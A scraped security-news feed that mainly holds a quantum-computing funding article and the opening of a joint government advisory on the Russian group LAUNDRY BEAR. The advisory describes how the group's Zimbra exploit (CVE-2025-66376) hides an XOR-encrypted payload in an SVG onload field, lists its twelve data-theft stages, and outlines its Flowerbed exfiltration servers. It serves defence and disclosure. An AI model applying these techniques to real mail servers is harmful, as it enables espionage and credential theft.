				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Noctua/Pulsar</p></div>



<p>Mein Kollege und Namensvetter Michael Crider hat sich die kostspielige (<a href="https://www.pcwelt.de/article/3172820/steam-machine-valves-konsole-kostet-ab-1039-euro.html">ab 1.039 Euro</a>) Steam Machine gekauft und einem <a href="https://www.pcwelt.de/article/3194800/steam-machine-im-praxistest-ganz-nett-aber-leider-enttaeuschend.html" target="_blank" rel="noreferrer noopener">ausführlichen Praxistest</a> unterzogen. Sein Fazit fällt allerdings ernüchternd aus: Ein günstiger Mini-PC mit selbst installiertem SteamOS bietet derzeit nahezu denselben Nutzen für deutlich weniger Geld.</p>



<p>Warum es ein Problem ist, dass <a href="https://www.pcwelt.de/article/3193615/in-neuen-laptops-kommen-alte-cpus-zum-einsatz-das-ist-ein-problem.html" target="_blank" rel="noreferrer noopener">in neuen Laptops alte CPUs zum Einsatz kommen</a>, erklärt mein Kollege Mark Hachman.  </p>



<h2 class="wp-block-heading toc">Vielen Dank fürs Lesen!</h2>



<p>ommende Woche besuchen Kris und ich endlich unseren Modder Stefan, der uns dann hoffentlich schon das fast fertige Tisch-PC-Gehäuse für die Build-Week präsentiert – immer optimistisch bleiben, denn langsam drängt die Zeit. Außerdem reisen wir zurück ins Jahr 2013 zur legendären Höllenmaschine 5 mit den vielen Totenköpfen. Wenn ihr nichts verpassen wollt, abonniert den <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">kostenlosen HMX-6-Newsletter</a> – und denkt daran, eure Anmeldung per E-Mail zu bestätigen. Ich freue mich schon auf nächste Woche – bis dann! Euer Michi.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Federal quantum bet grows with DARPA’s $125 million PsiQuantum award]]></title>
<description><![CDATA[Defense research agency DARPA made its largest quantum computing award ever this week, with a $125 million agreement announced on Wednesday. The same day, the White House announced an additional $5 billion for the Genesis Mission, which focuses on AI for science but also includes technology to ac...]]></description>
<link>https://tsecurity.de/de/3689459/it-security-nachrichten/federal-quantum-bet-grows-with-darpas-125-million-psiquantum-award/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689459/it-security-nachrichten/federal-quantum-bet-grows-with-darpas-125-million-psiquantum-award/</guid>
<pubDate>Thu, 23 Jul 2026 17:13:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Defense research agency DARPA made its largest quantum computing award ever this week, with a <a href="https://www.psiquantum.com/news-import/psiquantum-signs-125-million-agreement-with-darpa">$125 million agreement</a> announced on Wednesday. The same day, the White House announced an <a href="https://www.whitehouse.gov/releases/2026/07/45502/">additional $5 billion for the Genesis Mission</a>, which focuses on AI for science but also includes technology to accelerate quantum computing and quantum sensors.</p>



<p class="wp-block-paragraph">“Taken together, these announcements signal that U.S. quantum strategy is shifting from supporting individual research projects to building the infrastructure needed for a quantum-enabled economy,” says <a href="https://www.linkedin.com/in/heather-c-west-ph-d-52075667/">Heather West</a>, research manager in the infrastructure systems, platforms, and technology group at IDC.</p>



<p class="wp-block-paragraph">None of the individual quantum announcements are surprising, she says. But the level of coordination is new. “Government investment is expanding beyond foundational research toward commercialization, manufacturing, and deployment,” she says.</p>



<p class="wp-block-paragraph">“The US government has been signaling that quantum computing is a priority,” says <a href="https://www.linkedin.com/in/davidmooter/">David Mooter</a>, an analyst at Forrester Research. Part of it is the desire for the US to be a leader in quantum, as it has been in other high-tech areas, he says. And part of it is because the government itself can take advantage of quantum computers.</p>



<p class="wp-block-paragraph">“Spy agencies would love to use them to decrypt intercepted messages, including messages they intercepted years ago and saved,” he says. And other departments could use quantum computers or networks for energy-related research, for supply chain optimization, and for secure communications. </p>



<p class="wp-block-paragraph">Quantum computing is accelerating, he says. “I would not be surprised to see a general gate-based quantum computer that’s good enough to provide commercial value for limited use cases by 2030.”</p>



<h2 class="wp-block-heading">DARPA’s Quantum Benchmarking Initiative</h2>



<p class="wp-block-paragraph">DARPA’s Quantum Benchmarking Initiatives was launched in 2024, and 18 companies were selected in April of 2025 for <a href="https://www.darpa.mil/news/2025/companies-targeting-quantum-computers">Stage A of the project</a>, with awards of up to $1 million each. The companies were to use the money to provide details of their concepts and show how they could lead to a functional, fault-tolerant quantum computer in under a decade.</p>



<p class="wp-block-paragraph">Then, in November of 2025, DARPA chose 11 companies for <a href="https://www.darpa.mil/research/programs/quantum-benchmarking-initiative/stage-b-selection">Stage B of the project</a>, with awards of up to $15 million for developing their research plans.</p>



<p class="wp-block-paragraph">To date, only two companies have been chosen for <a href="https://www.darpa.mil/news/2025/quantum-computing-approaches">Stage C</a>: PsiQuantum and Microsoft. PsiQuantum announced $32 million of DARPA funding for testing and evaluation in September of last year. This week’s $125 million award will expand the scope and pacing of the validation and verification work. Stage C awards can go up to $300 million, <a href="https://www.darpa.mil/sites/default/files/attachment/2025-09/darpa-mto-spark-tank-qbi.pdf">according to DARPA</a>.</p>



<p class="wp-block-paragraph">This past May, <a href="https://www.psiquantum.com/news-import/us-department-of-commerce">PsiQuantum also announced $100 million</a> from the Department of Commerce, part of the CHIPS and Science Act, to accelerate domestic manufacturing of critical quantum computing components.</p>



<p class="wp-block-paragraph">Microsoft and PsiQuantum are both in Stage C, bypassing the sequential path that other companies are expected to follow, because they were both part of DARPA’s predecessor to QBI, the Underexplored Systems for Utility-Scale Quantum Computing program.</p>



<h2 class="wp-block-heading">Genesis Mission</h2>



<p class="wp-block-paragraph">Genesis Mission was <a href="https://www.whitehouse.gov/presidential-actions/2025/11/launching-the-genesis-mission/">launched</a> in late 2025 with the goal of using AI to accelerate scientific breakthroughs, and it now includes more than 15 government agencies.</p>



<p class="wp-block-paragraph">As part of the Genesis Mission, quantum computing and sensing company Infleqtion announced <a href="https://infleqtion.com/infleqtion-secures-three-genesis-mission-projects-from-u-s-department-of-energy/">three projects for the Department of Energy</a> on Wednesday. The three projects focus on quantum circuit design for nuclear applications, atomic quantum sensing, and nuclear fusion energy research.</p>



<p class="wp-block-paragraph">This announcement did not include the total monetary value of the projects, but, in May, the company announced a separate agreement with the Department of Commerce for $100 million to accelerate Infleqtion’s neutral-atom technology roadmap.</p>



<p class="wp-block-paragraph">Other quantum-related Genesis Mission projects announced this week include $1.5 million for a <a href="https://www.bluequbit.io/blog/bluequbit-and-partners-awarded-1-5m-in-doe-genesis-mission-grants-to-advance-ai-driven-quantum-error-correction">BlueQubit quantum error correction project</a> with Microsoft and other partners, a <a href="https://news.stanford.edu/stories/2026/07/stanford-and-slac-to-lead-genesis-mission-projects-that-tackle-the-nation-s-most-complex-science-and-technology-challenges">Stanford effort</a> to model the behavior of electrons at quantum scale, an <a href="https://news.mit.edu/2026/mit-projects-selected-funding-under-doe-genesis-mission-0723">MIT quantum sensing project</a>, Argonne National Laboratory <a href="https://www.anl.gov/article/argonne-to-lead-ai-research-projects-under-the-department-of-energys-genesis-mission">projects</a> on quantum circuit design and quantum sensors, Brookhaven Lab <a href="https://www.bnl.gov/newsroom/news.php?a=123041">quantum sensor projects</a>, and quantum computing <a href="https://news.northwestern.edu/stories/2026/07/northwestern-projects-receive-genesis-mission-funding">projects</a> at Northwestern University.</p>



<p class="wp-block-paragraph">IBM, one of three dozen private companies that are part of the <a href="https://www.genesismissionconsortium.org/our-members#private-sector">Genesis Mission Consortium</a>, announced that it will be leading a <a href="https://research.ibm.com/blog/ibm-us-genesis-mission-quantum-ai">project</a> to support more effective quantum applications, and will contribute up to $50 million of quantum compute access for the Genesis Mission.</p>



<h2 class="wp-block-heading">Enterprise priorities</h2>



<p class="wp-block-paragraph">This week’s quantum announcements aren’t a sign that enterprises need to run out and buy quantum computers, says IDC’s West. But they do need to start preparing for the quantum era — such as by identifying business areas where quantum computing could become a competitive differentiator over the next decade.</p>



<p class="wp-block-paragraph">But the most immediate threat is that of adversaries using quantum computers to break current encryption standards. Organizations should be inventorying cryptographic assets and developing a roadmap for the migration to quantum-proof algorithms, West says.</p>



<p class="wp-block-paragraph"><a href="https://www.networkworld.com/article/4158139/fixing-encryption-isnt-enough-quantum-developments-put-focus-on-authentication.html">The point of no return is closer than ever</a>, and many major players in the encryption and communication space, including Google and Cloudflare, have been accelerating their timelines. In fact, this Wednesday was the <a href="https://www.whitehouse.gov/presidential-actions/2026/06/securing-the-nation-against-advanced-cryptographic-attacks/">federal deadline</a> for naming their post-quantum cryptography migration leads under a June executive order.</p>



<p class="wp-block-paragraph">“The preparation that needs to be done to prepare is to implement post-quantum cryptography yesterday,” says Forrester’s Mooter.</p>



<p class="wp-block-paragraph">However, according to a survey <a href="https://www.digicert.com/news/quantum-security-deployment-remains-stuck">released by DigiCert this morning</a>, while 87% of organizations are planning, testing or implementing PQC initiatives, only 7% of organizations have deployed quantum-safe or hybrid cryptography across most of their digital certificates.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite]]></title>
<description><![CDATA[Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite
Executive summary 
A group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboratio...]]></description>
<link>https://tsecurity.de/de/3689407/sicherheitsluecken/russian-state-supported-cyber-actors-conduct-phishing-campaign-targeting-users-of-zimbra-collaboration-suite/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689407/sicherheitsluecken/russian-state-supported-cyber-actors-conduct-phishing-campaign-targeting-users-of-zimbra-collaboration-suite/</guid>
<pubDate>Thu, 23 Jul 2026 16:59:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="c-page-title__buttons"><a class="c-button" href="https://media.defense.gov/2026/Jul/22/2003965244/-1/-1/1/CSA_RUSSIA_PHISHING_TARGET_ZIMBRA.PDF">Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite</a></div>
<h2><strong>Executive summary</strong> </h2>
<p>A group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboration Suite (ZCS) software since at least July 2025. The Russian state-supported advanced persistent threat (APT) group’s activity is tracked in the cybersecurity community under several names (see <a href="https://www.cisa.gov/#cyber1">Cybersecurity industry tracking</a>), primarily as “LAUNDRY BEAR,” a name initially coined by the Netherlands General Intelligence and Security Service (AIVD) and Defence Intelligence and Security Service (MIVD) [<a href="https://www.cisa.gov/#wc1">1</a>].</p>
<p>LAUNDRY BEAR’s targeting is almost certainly to gather sensitive information for the Russian Federation, with these actors primarily focusing on the covert acquisition of email data. Previous campaigns indicated LAUNDRY BEAR relied on unsophisticated initial access techniques—including password spraying, phishing, and pass-the-cookie—allowing the group to successfully run high-volume operations. The latest campaign targeting ZCS uses a novel exploit that was a zero-day vulnerability when first exploited and continues to be successfully exploited. The vulnerability, Common Vulnerabilities and Exposures (CVE) <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a>, was patched in November 2025. This demonstrates LAUNDRY BEAR’s intent and ability to deploy increasingly sophisticated technical capabilities.</p>
<p>Unlike traditional phishing campaigns that persuade a user into taking an action, such as clicking a link or opening a file, LAUNDRY BEAR’s latest campaign leverages a view-based exploit that only requires a user to view a malicious email within a vulnerable version of the webmail service. Once viewed, the exploit attempts to exfiltrate the victim’s last 90 days of email communications, the organization email directory (i.e., Global Address List [GAL]), and other sensitive information to servers controlled by LAUNDRY BEAR. The exploit also attempts to establish persistent access to victim accounts through a variety of means as detailed in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> section.</p>
<p>This Cybersecurity Advisory (CSA) warns of this ongoing malicious threat activity and urges organizations to update their vulnerable software and implement additional mitigations to thwart these Russian state-supported actors’ continued success. The CSA is being released by the following authoring and co-sealing agencies:</p>
<ul>
<li>United States National Security Agency (NSA)</li>
<li>United States Federal Bureau of Investigation (FBI)</li>
<li>Netherlands Defence Intelligence and Security Service (MIVD)</li>
<li>Netherlands General Intelligence and Security Service (AIVD)</li>
<li>United States Cybersecurity and Infrastructure Security Agency (CISA)</li>
<li>United States Defense Counterintelligence and Security Agency (DCSA)</li>
<li>United States Department of Defense Cyber Crime Center (DC3)</li>
<li>United States Department of the Treasury</li>
<li>United States Naval Criminal Investigative Service (NCIS)</li>
<li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li>
<li>Communications Security Establishment Canada’s (CSE’s) Canadian Centre for Cyber Security (Cyber Centre)</li>
<li>New Zealand National Cyber Security Centre (NCSC-NZ)</li>
<li>United Kingdom National Cyber Security Centre (NCSC-UK)</li>
<li>Czech Republic National Cyber and Information Security Agency (NÚKIB)<a href="https://www.cisa.gov/#f1"><sup>1</sup></a></li>
<li>Danish Defence Intelligence Service (DDIS)<a href="https://www.cisa.gov/#f2"><sup>2</sup></a></li>
<li>Estonian Foreign Intelligence Service (EFIS)<a href="https://www.cisa.gov/#f3"><sup>3</sup></a></li>
<li>Finnish Defence Intelligence (FDI)<a href="https://www.cisa.gov/#f4"><sup>4</sup></a></li>
<li>Finnish Security and Intelligence Service (SUPO)<a href="https://www.cisa.gov/#f5"><sup>5</sup></a></li>
<li>French General Directorate for Internal Security (DGSI)<a href="https://www.cisa.gov/#f6"><sup>6</sup></a></li>
<li>French National Cybersecurity Agency (ANSSI)<a href="https://www.cisa.gov/#f7"><sup>7</sup></a></li>
<li>Italian External Intelligence and Security Agency (AISE)<a href="https://www.cisa.gov/#f8"><sup>8</sup></a></li>
<li>Italian Internal Intelligence and Security Agency (AISI)<a href="https://www.cisa.gov/#f9"><sup>9</sup></a></li>
<li>Security and Intelligence Service of the Republic of Moldova (SIS RM)<a href="https://www.cisa.gov/#f10"><sup>10</sup></a></li>
<li>Polish Foreign Intelligence Agency (AW)<a href="https://www.cisa.gov/#f11"><sup>11</sup></a></li>
<li>The Military Counterintelligence Service of Poland (SKW)<a href="https://www.cisa.gov/#f12"><sup>12</sup></a></li>
<li>Spain National Intelligence Centre (CNI)<a href="https://www.cisa.gov/#f13"><sup>13</sup></a></li>
<li>Sweden National Cyber Security Centre (NCSC-SE)<a href="https://www.cisa.gov/#f14"><sup>14</sup></a></li>
</ul>
<p>The authoring agencies urge any organizations using ZCS to implement the recommendations listed within the <a href="https://www.cisa.gov/#mitigations1">Mitigations</a> section of this advisory to reduce the risk associated with this activity. This CSA also includes specific remediations for organizations to implement if they discover the presence of the listed <a href="https://www.cisa.gov/#ioc1">Indicators of compromise</a> (IOCs).  </p>
<p>As more organizations update their ZCS software based on this CSA, LAUNDRY BEAR may discontinue the current campaign exploiting this vulnerability; however, based on the success of this and previous campaigns, it is very likely that the group will continue to target ZCS and other email systems used by organizations in Western countries. The actors will almost certainly continue to rely on email to engage potential victims by exploiting novel vulnerabilities and, when necessary, use social engineering techniques to assist with their efforts. The authoring agencies recommend organizations regularly update their mail service software and continuously monitor their email systems and emails for malicious activity.</p>
<p>For a downloadable list of IOCs, see:</p>
<ul>
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-204A.stix_.xml">AA26-204A.stix.xml</a> (STIX XML)</li>
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-204A.stix_.json">AA26-204A.stix.json</a> (STIX JSON)</li>
</ul>
<h2><strong>Cybersecurity industry tracking</strong><a class="ck-anchor"></a></h2>
<p>The cybersecurity industry provides overlapping cyber threat intelligence, indicators of compromise (IOCs), and mitigation recommendations related to these Russian state-supported cyber actors. While not exhaustive, the following are threat group names commonly used for these actors within the cybersecurity community:</p>
<ul>
<li>LAUNDRY BEAR</li>
<li>Void Blizzard [<a href="https://www.cisa.gov/#wc2">2</a>]</li>
<li>CL-STA-1114 [<a href="https://www.cisa.gov/#wc3">3</a>]</li>
<li>TA488 (formerly UNK_PitStop) [<a href="https://www.cisa.gov/#wc4">4</a>]</li>
</ul>
<p><strong>Note:</strong> Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. government’s understanding for all activity related to these groupings.</p>
<h2><strong>Background</strong></h2>
<p>Public advisories from Netherlands General Intelligence and Security Service (AIVD), Netherlands Defence Intelligence and Security Service (MIVD), and Microsoft highlighted these Russian state-supported advanced persistent threat (APT) actors in May 2025, calling them LAUNDRY BEAR and Void Blizzard respectively [<a href="https://www.cisa.gov/#wc1">1</a>] [<a href="https://www.cisa.gov/#wc2">2</a>]. Both advisories assessed that the group was engaged in malicious cyber activity as early as April 2024.  </p>
<p>The May 2025 advisories highlighted a cluster of activity targeting cloud-based email environments, including Microsoft Exchange in particular, and abusing legitimate APIs to perform data exfiltration in bulk [<a href="https://attack.mitre.org/versions/v19/techniques/T1114/002/" target="_blank">T1114.002</a>]. The group relied on unsophisticated means of initial access, including procuring stolen credentials on criminal marketplaces [<a href="https://attack.mitre.org/versions/v19/techniques/T1078/" target="_blank">T1078</a>], and using social engineering techniques to lure targets into interacting with a malicious site masquerading as a legitimate one. As of April 2025, one of these sites resembled a European Defence &amp; Security Summit registration portal that required registrants to sign in to their Microsoft account to view. Once a user entered their Microsoft credentials into this malicious site, LAUNDRY BEAR’s modified version of the open source adversary emulation toolkit, Evilginx, intercepted the user’s credentials. LAUNDRY BEAR then used this authentication data, including passwords and session tokens, to access the compromised account and conduct mass email exfiltration, as well as harvest other information. This method of compromise is commonly known as an adversary-in-the-middle (AiTM) technique [<a href="https://attack.mitre.org/versions/v19/techniques/T1557/" target="_blank">T1557</a>].  </p>
<p>Beginning around July 2025, LAUNDRY BEAR shifted toward a more technical method of email compromise, highlighting their continued efforts to covertly acquire email communications from a variety of Western organizations of interest and deliver them to the Russian Federation. Using a custom-developed capability [<a href="https://attack.mitre.org/versions/v19/techniques/T1587/001/" target="_blank">T1587.001</a>] named “<em>Улей</em>” or “<em>Ulej</em>” (Russian for beehive), LAUNDRY BEAR successfully targeted and exfiltrated sensitive user information from organizations who use the Zimbra Collaboration Suite (ZCS) product [<a href="https://attack.mitre.org/versions/v19/techniques/T1114/" target="_blank">T1114</a>]. Data LAUNDRY BEAR attempted to exfiltrate from compromised accounts included:</p>
<ul>
<li>Last 90 days of emails,</li>
<li>Email address,</li>
<li>Password [<a href="https://attack.mitre.org/versions/v19/techniques/T1589/001/" target="_blank">T1589.001</a>],</li>
<li>Global Address List (GAL) [<a href="https://attack.mitre.org/versions/v19/techniques/T1087/" target="_blank">T1087</a>],</li>
<li>Two-factor authentication (2FA) tokens, and</li>
<li>Newly-created Application Passcode [<a href="https://attack.mitre.org/versions/v19/techniques/T1098/" target="_blank">T1098</a>].</li>
</ul>
<p>The covert and persistent nature of this activity, along with the absence of any known financial extortion, almost certainly indicates this group’s involvement in espionage activities with Russian government backing. Additionally, extensive Ukrainian targeting, prior to use against U.S. and other NATO allies, outlines an increasing trend within Russian cyber threat groups to target Ukrainian users first—both as a priority target and as a testbench for malicious cyber techniques before broader global deployment.</p>
<h2><strong>Targeting details</strong></h2>
<p>LAUNDRY BEAR has targeted and compromised users in various organizations, including those associated with:</p>
<ul>
<li>the Defense Industrial Base (DIB),  </li>
<li>the federal and local government,</li>
<li>education,</li>
<li>energy,</li>
<li>law enforcement,  </li>
<li>media,  </li>
<li>non-governmental organizations, and</li>
<li>technology.</li>
</ul>
<h2><strong>Technical details</strong></h2>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v19/matrices/enterprise/" target="_blank">MITRE ATT&amp;CK® Matrix for Enterprise</a> framework, version 19. This advisory also uses <a href="https://d3fend.mitre.org/" target="_blank">MITRE D3FEND<sup>TM</sup></a> version 1.4.0<a href="https://www.cisa.gov/#f15"><sup>15</sup></a>. See <a href="https://www.cisa.gov/#appendixa">Appendix A</a> and <a href="https://www.cisa.gov/#appendixb">Appendix B</a> for tables of the activity mapped to MITRE ATT&amp;CK and D3FEND tactics, techniques, and countermeasures.</p>
<p><em>Ulej </em>is a novel data exfiltration and aggregation capability, that currently (as of the publication of this report) supports a campaign specifically targeting users of ZCS webmail servers. This capability is used to exploit <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a> [Common Weakness Enumeration (CWE) <a href="https://cwe.mitre.org/data/definitions/79.html" target="_blank">CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'</a>)], but likely could be adapted to exploit other vulnerabilities. It exfiltrates emails and other sensitive user data from a victim’s system immediately after exploitation and stores the data in an actor-controlled unattributable virtual private server (VPS) [<a href="https://attack.mitre.org/versions/v19/techniques/T1074/002/" target="_blank">T1074.002</a>] running LAUNDRY BEAR’s “Flowerbed” collection framework. The collected data is almost certainly further exfiltrated to internal network resources for review and long-term retention.</p>
<h3><em><strong>Reconnaissance</strong></em></h3>
<p>LAUNDRY BEAR uses the <em>Ulej </em>capability to exploit the <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a> vulnerability in organizations using ZCS. This campaign’s targeted victimology and limited exploitation capabilities likely indicate this group manually identifies and targets the victim organizations. LAUNDRY BEAR likely identifies organizations with public-facing Zimbra infrastructure by port scanning [<a href="https://attack.mitre.org/versions/v19/techniques/T1595/" target="_blank">T1595</a>] and fingerprinting datasets easily procured through various commercial vendors [<a href="https://attack.mitre.org/versions/v19/techniques/T1596/005/" target="_blank">T1596.005</a>].  </p>
<p>After identifying a target organization, the group likely compiles email addresses for individual users to target with the exploit [<a href="https://attack.mitre.org/versions/v19/techniques/T1589/002/" target="_blank">T1589.002</a>] from datasets offered by commercial vendors [<a href="https://attack.mitre.org/versions/v19/techniques/T1597/002/" target="_blank">T1597.002</a>], open source intelligence [<a href="https://attack.mitre.org/versions/v19/techniques/T1593/" target="_blank">T1593</a>], or previously exfiltrated data [<a href="https://attack.mitre.org/versions/v19/techniques/T1597/" target="_blank">T1597</a>].  </p>
<h3><em><strong>Resource development </strong></em><a class="ck-anchor"></a></h3>
<p>The actors procure VPSs from a variety of providers [<a href="https://attack.mitre.org/versions/v19/techniques/T1583/003/" target="_blank">T1583.003</a>], including those with Know Your Customer (KYC) requirements, and often use fabricated identities. LAUNDRY BEAR primarily uses Mullvad VPN [<a href="https://attack.mitre.org/versions/v19/techniques/T1583/">T1583</a>] when interacting with these servers, further demonstrating the group’s intent to mask their identity and maintain operations security (OPSEC). After the server is provisioned, an automated process deploys the Docker containers necessary for <em>Ulej’s</em> Flowerbed framework [<a href="https://attack.mitre.org/versions/v19/techniques/T1608/">T1608</a>], which then receives and aggregates the data <em>Ulej</em> exfiltrates. These servers are typically only used for 7-60 days before moving to new infrastructure.</p>
<h4><strong>Flowerbed framework</strong></h4>
<p>Flowerbed is a Python project that uses Docker for containerization. The project includes four different Docker containers:</p>
<ul>
<li>Catcher,</li>
<li>Certbot,</li>
<li>Nginx, and</li>
<li>Gardener.</li>
</ul>
<p>Catcher acts as both a DNS and HTTP server to receive and aggregate exfiltrated victim information [<a href="https://attack.mitre.org/versions/v19/techniques/T1048/">T1048</a>]. For additional information on Catcher, refer to the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section of this advisory. Flowerbed’s next container, Certbot, is based on one of the official Certbot containers, which allows for automated generation of Let’s Encrypt certificates using DNS challenges through Cloudflare. This certificate can then be used by the Nginx container, which serves as an HTTPS reverse proxy for Catcher, enabling Flowerbed to disguise some of its exfiltration activity through an encrypted communications channel [<a href="https://attack.mitre.org/versions/v19/techniques/T1048/002/" target="_blank">T1048.002</a>]. The Nginx reverse proxy also validates that the Server Name Indicator (SNI) value contains “*.i.*” prior to forwarding the traffic to Catcher. If the SNI does not contain that string, the Nginx server returns a 444 error to the client. This is likely an attempt to reject non-Ulej connections. Finally, the Gardener container functions as a health check for the Catcher service. Gardener is a simple Python script that validates Catcher correctly receives and processes data.</p>
<p>The simplistic Flowerbed codebase has indications that artificial intelligence (AI) played a role in its development. This highlights how AI is increasingly being used to develop malicious capabilities [<a href="https://attack.mitre.org/versions/v19/techniques/T1588/007/" target="_blank">T1588.007</a>]. The dependence on AI for a simple capability, such as Flowerbed, alongside a previous reliance on open source capabilities, such as Evilginx2 [<a href="https://attack.mitre.org/versions/v19/techniques/T1588/002/" target="_blank">T1588.002</a>], likely indicates a lack of advanced technical knowledge within LAUNDRY BEAR, especially in relation to true software development capabilities.</p>
<h3><em><strong>Initial access</strong></em></h3>
<p>To gain initial access, LAUNDRY BEAR sends an email containing a malicious JavaScript payload to the target [<a href="https://attack.mitre.org/versions/v19/techniques/T1566/" target="_blank">T1566</a>]. Through exploitation of <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a>, this JavaScript payload is immediately executed once the user views the malicious email [<a href="https://attack.mitre.org/versions/v19/techniques/T1203/" target="_blank">T1203</a>], such as the one shown in <a href="https://www.cisa.gov/#figure1"><strong>Figure 1</strong></a>, in the ZCS webmail platform. Since at least November 2025, LAUNDRY BEAR began sending these phishing emails from victim infrastructure through compromised accounts [<a href="https://attack.mitre.org/versions/v19/techniques/T1199/" target="_blank">T1199</a>], as shown in the email metadata in <a href="https://www.cisa.gov/#figure2"><strong>Figure 2</strong></a>. These compromised accounts were likely previous victims of this, or another LAUNDRY BEAR, campaign and their use is intended to further obfuscate and frustrate anti-phishing tools and training.</p>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure1.png?itok=yrzcl7tK" width="604" height="235" alt="Figure 1: Example of malicious email">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 1: Example of malicious email</strong></em></figcaption>
  </figure>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure2.png?itok=vEulmmyx" width="604" height="102" alt="Figure 2: Headers from an example malicious email">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 2: Headers from an example malicious email</strong></em></figcaption>
  </figure>
<p>According to the National Vulnerability Database (NVD), <a href="https://nvd.nist.gov/vuln/detail/CVE-2025-66376" target="_blank">CVE-2025-66376</a> was initially published on 5 January 2026. This vulnerability allows for execution of a JavaScript payload included in email content due to improper sanitization of Cascading Style Sheet’s (CSS) @import directives within an email [<a href="https://www.cisa.gov/#wc5">5</a>]. Because the activity attributed to this campaign began in July 2025—months before Synacor released a patch and the CVE was published—the payload initially exploited a zero-day vulnerability at that time [<a href="https://attack.mitre.org/versions/v19/techniques/T1587/004/" target="_blank">T1587.004</a>].  </p>
<p><strong>Utilization of a zero-day exploit within this campaign demonstrates the ability for even emerging threat groups like LAUNDRY BEAR to operationalize novel exploits into a highly successful capability.</strong></p>
<p>Hidden in LAUNDRY BEAR’s email is a Base64 encoded payload within the “onload” field of a Scalable Vector Graphics (SVG) element [<a href="https://attack.mitre.org/versions/v19/techniques/T1027/017/" target="_blank">T1027.017</a>], as shown in <a href="https://www.cisa.gov/#figure3"><strong>Figure 3</strong></a>. Leading up to the inclusion of this payload in the SVG element are various instances of @import directives, as required to leverage <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376">CVE-2025-66376</a>. This payload includes an XOR encrypted final script encoded in a Base64 inner payload (see <a href="https://www.cisa.gov/#figure3"><strong>Figure 3</strong></a>) [<a href="https://attack.mitre.org/versions/v19/techniques/T1027/013/" target="_blank">T1027.013</a>]. The outer payload decodes and decrypts the inner payload using an XOR function and a hardcoded key and then executes the script contained within the inner payload containing the collection and exfiltration logic. By changing the key used for the XOR encryption of the inner payload or adding additional @import directives with non-functional code [<a href="https://attack.mitre.org/versions/v19/techniques/T1027/010/" target="_blank">T1027.010</a>], LAUNDRY BEAR can easily generate new payloads that bypass basic threat detection signatures. This malicious payload attempts to collect and exfiltrate information in 12 asynchronous stages [<a href="https://attack.mitre.org/versions/v19/techniques/T1119/">T1119</a>]. The stages in order of appearance within the payload are as follows:</p>
<ol>
<li>sendStartPing,</li>
<li>gather_email,</li>
<li>gather_environment,</li>
<li>gather_2fa_codes,</li>
<li>gather_app_password,</li>
<li>gather_device_status,</li>
<li>gather_oauth_consumers,</li>
<li>gather_autocomplete_password,</li>
<li>enable_mail_protocols,</li>
<li>gather_gal,</li>
<li>sendArchives, and</li>
<li>sendFinishPing. </li>
</ol>
<p><a class="ck-anchor"></a></p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2026-07/figure3_0.png?itok=M-bj5-nb" width="607" height="577" alt="Figure 3: Malicious payload of example email">



</div>
      <figcaption class="c-figure__caption"><em><strong>Figure 3: Malicious payload of example email</strong></em></figcaption>
  </figure>
